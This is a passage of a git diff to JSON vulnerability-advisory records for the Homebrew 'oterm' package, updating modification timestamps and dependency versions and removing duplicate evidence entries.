"2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-75c5-xw7c-p5pm", "CVE-2024-53861", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2024-53981.json b/advisories/BREW-oterm-CVE-2024-53981.json index cadd733d3bc..b1dde7e18e7 100644 --- a/advisories/BREW-oterm-CVE-2024-53981.json +++ b/advisories/BREW-oterm-CVE-2024-53981.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2024-53981", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-59g5-xgcq-4qw3", "CVE-2024-53981", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2025-43859.json b/advisories/BREW-oterm-CVE-2025-43859.json index d6d6140080e..7c8be896e3e 100644 --- a/advisories/BREW-oterm-CVE-2025-43859.json +++ b/advisories/BREW-oterm-CVE-2025-43859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-43859", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-vqfr-h8mv-ghfj", "CVE-2025-43859", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "h11", - "subject_version": "0.16.0", - "key": "pkg:pypi/h11@0.16.0", - "resource": "h11" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2025-4565.json b/advisories/BREW-oterm-CVE-2025-4565.json index c35ca940615..9788095240e 100644 --- a/advisories/BREW-oterm-CVE-2025-4565.json +++ b/advisories/BREW-oterm-CVE-2025-4565.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-4565", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-8qvm-5x2c-j2w7", "CVE-2025-4565", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "6.31.1", "resource": "protobuf", - "resource_purl": "pkg:pypi/protobuf@6.33.6" + "resource_purl": "pkg:pypi/protobuf@7.36.1" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "protobuf", - "subject_version": "6.33.6", - "key": "pkg:pypi/protobuf@6.33.6", - "resource": "protobuf" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "6.33.6", - "key": "pkg:pypi/protobuf@6.33.6", + "subject_version": "7.36.1", + "key": "pkg:pypi/protobuf@7.36.1", "resource": "protobuf" } ] diff --git a/advisories/BREW-oterm-CVE-2025-46656.json b/advisories/BREW-oterm-CVE-2025-46656.json index 9f0d0c0092a..6dc63939203 100644 --- a/advisories/BREW-oterm-CVE-2025-46656.json +++ b/advisories/BREW-oterm-CVE-2025-46656.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-46656", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-7mpr-5m44-h73r", "CVE-2025-46656", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdownify", - "subject_version": "1.2.3", - "key": "pkg:pypi/markdownify@1.2.3", - "resource": "markdownify" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2025-50181.json b/advisories/BREW-oterm-CVE-2025-50181.json index e78db7d64a7..79f19c18f54 100644 --- a/advisories/BREW-oterm-CVE-2025-50181.json +++ b/advisories/BREW-oterm-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-50181", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2025-50182.json b/advisories/BREW-oterm-CVE-2025-50182.json index d102c953a76..400ada1f492 100644 --- a/advisories/BREW-oterm-CVE-2025-50182.json +++ b/advisories/BREW-oterm-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-50182", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2025-53365.json b/advisories/BREW-oterm-CVE-2025-53365.json index 361a778ab38..9ddd382b078 100644 --- a/advisories/BREW-oterm-CVE-2025-53365.json +++ b/advisories/BREW-oterm-CVE-2025-53365.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-53365", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-j975-95f5-7wqh", "CVE-2025-53365", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.10.0", "resource": "mcp", - "resource_purl": "pkg:pypi/mcp@1.29.0" + "resource_purl": "pkg:pypi/mcp@2.1.1" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "mcp", - "subject_version": "1.29.0", - "key": "pkg:pypi/mcp@1.29.0", - "resource": "mcp" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.29.0", - "key": "pkg:pypi/mcp@1.29.0", + "subject_version": "2.1.1", + "key": "pkg:pypi/mcp@2.1.1", "resource": "mcp" } ] diff --git a/advisories/BREW-oterm-CVE-2025-53366.json b/advisories/BREW-oterm-CVE-2025-53366.json index edbc6496728..a63c872ba0f 100644 --- a/advisories/BREW-oterm-CVE-2025-53366.json +++ b/advisories/BREW-oterm-CVE-2025-53366.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-53366", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-3qhf-m339-9g5v", "CVE-2025-53366", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.9.4", "resource": "mcp", - "resource_purl": "pkg:pypi/mcp@1.29.0" + "resource_purl": "pkg:pypi/mcp@2.1.1" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "mcp", - "subject_version": "1.29.0", - "key": "pkg:pypi/mcp@1.29.0", - "resource": "mcp" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.29.0", - "key": "pkg:pypi/mcp@1.29.0", + "subject_version": "2.1.1", + "key": "pkg:pypi/mcp@2.1.1", "resource": "mcp" } ] diff --git a/advisories/BREW-oterm-CVE-2025-54121.json b/advisories/BREW-oterm-CVE-2025-54121.json index 9cffe2fbf1c..3c5ee054ac4 100644 --- a/advisories/BREW-oterm-CVE-2025-54121.json +++ b/advisories/BREW-oterm-CVE-2025-54121.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-54121", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-2c2j-9gv5-cj73", "CVE-2025-54121", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.47.2", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-oterm-CVE-2025-59420.json b/advisories/BREW-oterm-CVE-2025-59420.json index 96767c72abc..384ee4a314b 100644 --- a/advisories/BREW-oterm-CVE-2025-59420.json +++ b/advisories/BREW-oterm-CVE-2025-59420.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-59420", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-9ggr-2464-2j32", "CVE-2025-59420", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.6.4", "resource": "authlib", - "resource_purl": "pkg:pypi/authlib@1.7.2" + "resource_purl": "pkg:pypi/authlib@1.8.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", + "subject_version": "1.8.0", + "key": "pkg:pypi/authlib@1.8.0", "resource": "authlib" } ] diff --git a/advisories/BREW-oterm-CVE-2025-61920.json b/advisories/BREW-oterm-CVE-2025-61920.json index 8e39fa9a817..a765a756a65 100644 --- a/advisories/BREW-oterm-CVE-2025-61920.json +++ b/advisories/BREW-oterm-CVE-2025-61920.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-61920", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-pq5p-34cr-23v9", "CVE-2025-61920", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.6.5", "resource": "authlib", - "resource_purl": "pkg:pypi/authlib@1.7.2" + "resource_purl": "pkg:pypi/authlib@1.8.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", + "subject_version": "1.8.0", + "key": "pkg:pypi/authlib@1.8.0", "resource": "authlib" } ] diff --git a/advisories/BREW-oterm-CVE-2025-62706.json b/advisories/BREW-oterm-CVE-2025-62706.json index ef2012f659a..5aee819c410 100644 --- a/advisories/BREW-oterm-CVE-2025-62706.json +++ b/advisories/BREW-oterm-CVE-2025-62706.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-62706", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-g7f3-828f-7h7m", "CVE-2025-62706", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.6.5", "resource": "authlib", - "resource_purl": "pkg:pypi/authlib@1.7.2" + "resource_purl": "pkg:pypi/authlib@1.8.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", + "subject_version": "1.8.0", + "key": "pkg:pypi/authlib@1.8.0", "resource": "authlib" } ] diff --git a/advisories/BREW-oterm-CVE-2025-62727.json b/advisories/BREW-oterm-CVE-2025-62727.json index 0f3a5dba432..fab6859a6fa 100644 --- a/advisories/BREW-oterm-CVE-2025-62727.json +++ b/advisories/BREW-oterm-CVE-2025-62727.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-62727", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-7f5h-v6xp-fcq8", "CVE-2025-62727", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "0.49.1", "resource": "starlette", - "resource_purl": "pkg:pypi/starlette@1.4.1" + "resource_purl": "pkg:pypi/starlette@1.6.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", - "resource": "starlette" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.4.1", - "key": "pkg:pypi/starlette@1.4.1", + "subject_version": "1.6.0", + "key": "pkg:pypi/starlette@1.6.0", "resource": "starlette" } ] diff --git a/advisories/BREW-oterm-CVE-2025-65015.json b/advisories/BREW-oterm-CVE-2025-65015.json index 3c682857440..d5a91bdf9d3 100644 --- a/advisories/BREW-oterm-CVE-2025-65015.json +++ b/advisories/BREW-oterm-CVE-2025-65015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-65015", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-frfh-8v73-gjg4", "CVE-2025-65015", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.4.2", "resource": "joserfc", - "resource_purl": "pkg:pypi/joserfc@1.7.4" + "resource_purl": "pkg:pypi/joserfc@1.7.5" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "joserfc", - "subject_version": "1.7.4", - "key": "pkg:pypi/joserfc@1.7.4", - "resource": "joserfc" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "joserfc", - "subject_version": "1.7.4", - "key": "pkg:pypi/joserfc@1.7.4", + "subject_version": "1.7.5", + "key": "pkg:pypi/joserfc@1.7.5", "resource": "joserfc" } ] diff --git a/advisories/BREW-oterm-CVE-2025-66416.json b/advisories/BREW-oterm-CVE-2025-66416.json index 210e50358bb..cc6550ff86c 100644 --- a/advisories/BREW-oterm-CVE-2025-66416.json +++ b/advisories/BREW-oterm-CVE-2025-66416.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-66416", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-9h52-p55h-vw2f", "CVE-2025-66416", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.23.0", "resource": "mcp", - "resource_purl": "pkg:pypi/mcp@1.29.0" + "resource_purl": "pkg:pypi/mcp@2.1.1" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "mcp", - "subject_version": "1.29.0", - "key": "pkg:pypi/mcp@1.29.0", - "resource": "mcp" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.29.0", - "key": "pkg:pypi/mcp@1.29.0", + "subject_version": "2.1.1", + "key": "pkg:pypi/mcp@2.1.1", "resource": "mcp" } ] diff --git a/advisories/BREW-oterm-CVE-2025-66418.json b/advisories/BREW-oterm-CVE-2025-66418.json index 13fddb33364..30956bc61e0 100644 --- a/advisories/BREW-oterm-CVE-2025-66418.json +++ b/advisories/BREW-oterm-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-66418", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2025-66471.json b/advisories/BREW-oterm-CVE-2025-66471.json index 2444110bff0..370ae103b3a 100644 --- a/advisories/BREW-oterm-CVE-2025-66471.json +++ b/advisories/BREW-oterm-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-66471", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2025-68146.json b/advisories/BREW-oterm-CVE-2025-68146.json index 484caadb4e6..3638a722fee 100644 --- a/advisories/BREW-oterm-CVE-2025-68146.json +++ b/advisories/BREW-oterm-CVE-2025-68146.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-68146", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-w853-jp5j-5j7f", "CVE-2025-68146", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.20.1", "resource": "filelock", - "resource_purl": "pkg:pypi/filelock@3.32.2" + "resource_purl": "pkg:pypi/filelock@3.32.5" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.32.2", - "key": "pkg:pypi/filelock@3.32.2", - "resource": "filelock" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.32.2", - "key": "pkg:pypi/filelock@3.32.2", + "subject_version": "3.32.5", + "key": "pkg:pypi/filelock@3.32.5", "resource": "filelock" } ] diff --git a/advisories/BREW-oterm-CVE-2025-68158.json b/advisories/BREW-oterm-CVE-2025-68158.json index 5d9f83a28d8..77cc9ec9e10 100644 --- a/advisories/BREW-oterm-CVE-2025-68158.json +++ b/advisories/BREW-oterm-CVE-2025-68158.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2025-68158", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-fg6f-75jq-6523", "CVE-2025-68158", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.6.6", "resource": "authlib", - "resource_purl": "pkg:pypi/authlib@1.7.2" + "resource_purl": "pkg:pypi/authlib@1.8.0" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", + "subject_version": "1.8.0", + "key": "pkg:pypi/authlib@1.8.0", "resource": "authlib" } ] diff --git a/advisories/BREW-oterm-CVE-2026-0994.json b/advisories/BREW-oterm-CVE-2026-0994.json index 63246abdd99..6d6088e3cb9 100644 --- a/advisories/BREW-oterm-CVE-2026-0994.json +++ b/advisories/BREW-oterm-CVE-2026-0994.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-0994", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-7gcm-g887-7qv7", "CVE-2026-0994", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "6.33.5", "resource": "protobuf", - "resource_purl": "pkg:pypi/protobuf@6.33.6" + "resource_purl": "pkg:pypi/protobuf@7.36.1" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "protobuf", - "subject_version": "6.33.6", - "key": "pkg:pypi/protobuf@6.33.6", - "resource": "protobuf" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "6.33.6", - "key": "pkg:pypi/protobuf@6.33.6", + "subject_version": "7.36.1", + "key": "pkg:pypi/protobuf@7.36.1", "resource": "protobuf" } ] diff --git a/advisories/BREW-oterm-CVE-2026-21441.json b/advisories/BREW-oterm-CVE-2026-21441.json index 58200807fe1..f0c94768278 100644 --- a/advisories/BREW-oterm-CVE-2026-21441.json +++ b/advisories/BREW-oterm-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-21441", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-22701.json b/advisories/BREW-oterm-CVE-2026-22701.json index 170f930f128..0bf0aa0afaf 100644 --- a/advisories/BREW-oterm-CVE-2026-22701.json +++ b/advisories/BREW-oterm-CVE-2026-22701.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-22701", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:17:35Z", "upstream": [ "GHSA-qmgc-5h2g-mvrw", "CVE-2026-22701", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.20.3", "resource": "filelock", - "resource_purl": "pkg:pypi/filelock@3.32.2" + "resource_purl": "pkg:pypi/filelock@3.32.5" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "filelock", - "subject_version": "3.32.2", - "key": "pkg:pypi/filelock@3.32.2", - "resource": "filelock" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "filelock", - "subject_version": "3.32.2", - "key": "pkg:pypi/filelock@3.32.2", + "subject_version": "3.32.5", + "key": "pkg:pypi/filelock@3.32.5", "resource": "filelock" } ] diff --git a/advisories/BREW-oterm-CVE-2026-23490.json b/advisories/BREW-oterm-CVE-2026-23490.json index 75b6898b852..f5c3db4c78a 100644 --- a/advisories/BREW-oterm-CVE-2026-23490.json +++ b/advisories/BREW-oterm-CVE-2026-23490.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-23490", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-17T17:41:22Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-63vm-454h-vhhq", "CVE-2026-23490", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyasn1", - "subject_version": "0.6.4", - "key": "pkg:pypi/pyasn1@0.6.4", - "resource": "pyasn1" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-23949.json b/advisories/BREW-oterm-CVE-2026-23949.json index ea0fbcbe22f..d5ad374abbd 100644 --- a/advisories/BREW-oterm-CVE-2026-23949.json +++ b/advisories/BREW-oterm-CVE-2026-23949.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-23949", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-58pv-8j8x-9vj2", "CVE-2026-23949", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jaraco-context", - "subject_version": "6.1.2", - "key": "pkg:pypi/jaraco-context@6.1.2", - "resource": "jaraco-context" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-24486.json b/advisories/BREW-oterm-CVE-2026-24486.json index 27cf64fdfbe..2f0432b983e 100644 --- a/advisories/BREW-oterm-CVE-2026-24486.json +++ b/advisories/BREW-oterm-CVE-2026-24486.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-24486", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-wp53-j4wj-2cfg", "CVE-2026-24486", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-oterm-CVE-2026-25580.json b/advisories/BREW-oterm-CVE-2026-25580.json index 2c357ba68a7..5d28ac267da 100644 --- a/advisories/BREW-oterm-CVE-2026-25580.json +++ b/advisories/BREW-oterm-CVE-2026-25580.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-25580", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-2jrp-274c-jhv3", "CVE-2026-25580", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.56.0", "resource": "pydantic-ai-slim", - "resource_purl": "pkg:pypi/pydantic-ai-slim@2.17.0" + "resource_purl": "pkg:pypi/pydantic-ai-slim@2.37.0" } } ], @@ -47,16 +47,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pydantic-ai-slim", - "subject_version": "2.17.0", - "key": "pkg:pypi/pydantic-ai-slim@2.17.0", - "resource": "pydantic-ai-slim" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pydantic-ai-slim", - "subject_version": "2.17.0", - "key": "pkg:pypi/pydantic-ai-slim@2.17.0", + "subject_version": "2.37.0", + "key": "pkg:pypi/pydantic-ai-slim@2.37.0", "resource": "pydantic-ai-slim" } ] diff --git a/advisories/BREW-oterm-CVE-2026-25640.json b/advisories/BREW-oterm-CVE-2026-25640.json index a717a8ba097..02868bbdbdb 100644 --- a/advisories/BREW-oterm-CVE-2026-25640.json +++ b/advisories/BREW-oterm-CVE-2026-25640.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-oterm-CVE-2026-25640", "published": "2026-08-13T17:24:19Z", - "modified": "2026-08-13T17:24:19Z", + "modified": "2026-09-10T20:19:31Z", "upstream": [ "GHSA-wjp5-868j-wqv7", "CVE-2026-25640", @@ -34,7 +34,7 @@ "range_state": "fixed", "upstream_fixed_in": "1.51.0", "resource": "pydantic-ai-slim", - "resource_purl": "pkg:pypi/pydantic-ai-slim@2.17.0" + "resource_purl": "pkg:pypi/pydantic-ai-slim@2.37.0" } } ], @@ -47,16 +47,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "pydantic-ai-slim", - "subject_version": "2.17.0", - "key": "pkg:pypi/pydantic-ai-slim@2.17.0", - "resource": "pydantic-ai-slim" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pydantic-ai-slim", - "subject_version": "2.17.0", - "key": "pkg:pypi/pydantic-ai-slim@2.17.0", + "subject_version": "2.37.0", + "key": "pkg:pypi/pydantic-ai-slim@2.37.0", "resource": "pydantic-ai-slim" } ] diff --git a/advisories/BREW-oterm-CVE-2026-25645.json b/advisories/BREW-oterm-CVE-2026-25645.json index 34c853825d2..5f5cf300422 100644 --- 